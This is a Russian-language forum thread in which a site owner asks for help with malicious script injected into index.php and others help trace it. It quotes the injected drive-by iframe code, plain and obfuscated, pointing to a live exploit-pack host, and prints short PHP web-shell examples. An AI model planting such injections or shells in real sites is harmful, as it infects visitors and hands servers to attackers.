Добрый день, дорогие форумчане! :)
Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал:
<script language="javascript">
document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%7 0%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64% 65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68 %65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3 E%3C%2F%69%66%72%61%6D%65%3E '));
</script>:mad:

Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты.
В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое.
Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало.
Прошу вашей помощи, помогите разобраться, что, к чему. :confused:

Спасибо!

напиши УРЛ сайта, все из базы удалят :)

Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>

хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой

Пару троев грохнул! Пасы сменил.

Может в каком-нить файле шелл просто?

Tigger, можиет, но как узнать?

Проверяй каждый файл на наличие вредоносного кода.

можиет, но как узнать?

для начала с автора нужно вытащить инфу о версии двига =)

То что это шелл - врятли...
Это скорее троянчик... причем недавно сделаннный...

<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
Открыл я этот сайт... Вот че получается. ПРи зарузке ентого сайтика грузится PDF документ прямо в браузере. Затем этот PDF документ каким-то образом загружает на комп основную вирусяку e.exe, которая сохраняется в папке C:\Documents and Settings\{USER}\Local Settings\Temp и опять же как-то запускает ее (КАК!?). Вот отчеты по e.exe:
http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae5 8aa1d152fa8c1b-1245078728

Это лично у меня так было. Можете конечно сами попробывать, если хотите.
Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени :)

P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =))

PDF Reader'a

а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок? ;)

а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок? ;)
Нет. Я так не думаю. Просто стало интересно как такое можно осуществить... ;) :) И я думаю не только одному мне...

ну допустим почитай тут

http://www.securitylab.ru/vulnerability/362445.php

http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144

ну допустим почитай тут
http://www.securitylab.ru/vulnerability/362445.php
http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144
+1 :)

Много связок грузятся через яваскрипт, неужели трудна разработчикам браузеров проконтролировать действия яваскрипта? Я видел как исхещряюца с кодом чтобы обмануть браузер,но все же... По поводу pdf, интересная идея, грузить троя через дыру в плагине.. Фантазии нет придела!
А чтобы не вычищать каждый день ифрэймы и яваскрипты, то надо хранить на балванке копию сайта и если какието произошли изменения, то файлики обновить и все, просто если сайт большой, замаешься чистить. А еще хорошо спрятанный шелл хрен найдешь.

для начала с автора нужно вытащить инфу о версии двига =)самописный :)

Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.

Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
такие хитроумные админы на gov-ах часто попадаются :(

Блин, сегодня захожу, там уже другая ***ня:
<script language="javascript">function _lUPNLpHJVX7T3P( _lXm9tW7QM2MwHU ){var _lxQthEExSQdZZz = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";var _lxXJqmgSlQpjg1 = '';var _lbtojDbzx931xM = 18;var _lHQlhGZ4PFhvYJ = 0;for ( var _lBDsi5JRjsUAiH = 0; _lBDsi5JRjsUAiH < _lXm9tW7QM2MwHU.length; _lBDsi5JRjsUAiH++ ) { var _l9b9wnGDPoJpiY = _lxQthEExSQdZZz.indexOf( _lXm9tW7QM2MwHU.charAt( _lBDsi5JRjsUAiH ) ); if ( _lbtojDbzx931xM == 0 ) { _lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY; var _luGKJPMN7vIHCr = ( _lHQlhGZ4PFhvYJ & 0xFF0000 ) >> 16;if ( _luGKJPMN7vIHCr != 0 ) {_lxXJqmgSlQpjg1 += String.fromCharCode( _luGKJPMN7vIHCr );}var _l0XsYfs0eeeliu = ( _lHQlhGZ4PFhvYJ & 0xFF00 ) >> 8;if ( _l0XsYfs0eeeliu != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _l0XsYfs0eeeliu );}var _lPrZyGK4RUKehH = _lHQlhGZ4PFhvYJ & 0xFF;if ( _lPrZyGK4RUKehH != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _lPrZyGK4RUKehH );}_lHQlhGZ4PFhvYJ = 0;_lbtojDbzx931xM = 18;} else {_l9b9wnGDPoJpiY = _l9b9wnGDPoJpiY << _lbtojDbzx931xM;_lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY;_lbtojDbzx931xM -= 6;}}return _lxXJqmgSlQpjg1;} document.write( _lUPNLpHJVX7T3P( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOa XGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );</script>Помогите, хелп, приклеевается в конец документа index.php :mad: Что делать? Вири на компе подавил

такие хитроумные админы на gov-ах часто попадаются

К сожалению на gov не работал =)

Блин, сегодня захожу, там уже другая ***ня:

Пасс на ФТП поменял?

если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.

Блин, сегодня захожу, там уже другая ***ня:
Помогите, хелп, приклеевается в конец документа index.php :mad: Что делать? Вири на компе подавил
Все, все да не все :)
Твой код соответствует этому:
<script language="javascript">
function dosometing( subvalue ){
var s1 = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";
var s2 = '';
var s3 = 18;
var s4 = 0;
for ( var i = 0; i < subvalue.length; i++ ) {
var s5 = s1.indexOf( subvalue.charAt( i ) );
if ( s3 == 0 ) {
s4 = s4 | s5;
var s6 = ( s4 & 0xFF0000 ) >> 16;
if ( s6 != 0 ) {
s2 += String.fromCharCode( s6 );
}
var s7 = ( s4 & 0xFF00 ) >> 8;
if ( s7 != 0 ){
s2 += String.fromCharCode( s7 );
}
var s8 = s4 & 0xFF;
if ( s8 != 0 ){
s2 += String.fromCharCode( s8 );
}
s4 = 0;
s3 = 18;
} else {
s5 = s5 << s3;
s4 = s4 | s5;
s3 -= 6;
}
}
return s2;
}
alert( dosometing( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOa XGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );
</script>
Что собственно сильно на результат не влияет :)
<iframe src="http://truba5.cn/index.php" width=1 height=1 sty???SO'f?6?&???G????FFVa#aAo?g&OSa
Хотя немного странно...

если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.

ИМХО это все-таки троян (ну всмысле автоматом делается). Просто внимательно надо посмотреть принцип работы...
А че шелл?.. Если это и шелл (хотя маловероятно), то шелл ТС и сам может найти...
Весь PHP-код на сайте посмотри. Там что-то "инородное" сразу, в принципе, невооруженным глазом видно :)

Спасибо, полез искать заразу :(

сервер на никсах?
смотри тщательно процессы. Все эти дела может запускать простенький скрипт, фопеном грузить откуда-то то, что надо и все..раз в час или в другой промежуток времени. вобще выставь r-r-r на индекс.пхп, а еще лучше човни индекс другим юзером)) и права на запись потом уже убери.корень не забудь тоже.

$n@ke, спасибо, поменяю права сейчас! :)

Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:

news127.inc (http://dump.ru/file/2921769) больше метра весит :)

$n@ke, спасибо, поменяю права сейчас! :)
Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:
news127.inc (http://dump.ru/file/2921769)
Это не шелл. Это прайс-лист, который ты можешь открыть и посмотреть, допустим, Word'ом 2007 :)
Кстати он там и делался... :)
Шелл это, допустим, вот так:
<?php
if(isset($_GET['cmd']){
system($_GET['cmd']);
passthru($_GET['cmd']);
}
?>
При чем данный код, может находиться хоть в середине, хоть в конце, хоть в начале документа. Ну это самый, что ни на есть простой тип. Более сложный это.... ну допустим... r57shell (взял его так как он и самый распространенный)...


больше метра весит :)
На 3 кб меньше :p :D

а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно

Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.

Так этот "скриптик" можно изменить:

<?php echo "Всё зае*ись! Шелов не обнаружено"; ?> ;)

Поэтому удалять его нужно с сервера до следующей проверки :)

а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно
Хостинг sweb.ru
Обращаться нет смысла, как всегда скажут смотрите свой комп. Др сайты на этом хосте норм! :)

Проверяй каждый файл на наличие вредоносного кода.

<?PHP
eval($_GET['c']);
?>

Врятдле это антивирус запалит

Интерестно,а можно выложить такой код?т.е. что-бы сделать страничку с вирей?

Как я понял, ифрейм добавляется с переодичностью, поиск идет по index.php, indeh.html, index.htm и так далее. И на сколько мне известно (или в апаче или где, сам не спец) можно делать, чтоб при заходе на site.com мы заходили не на site.com/index.php, а например, site.com/tratata.php. Это, конечно, только, чтоб не было ифреймов, а было время спокойно поискать что откуда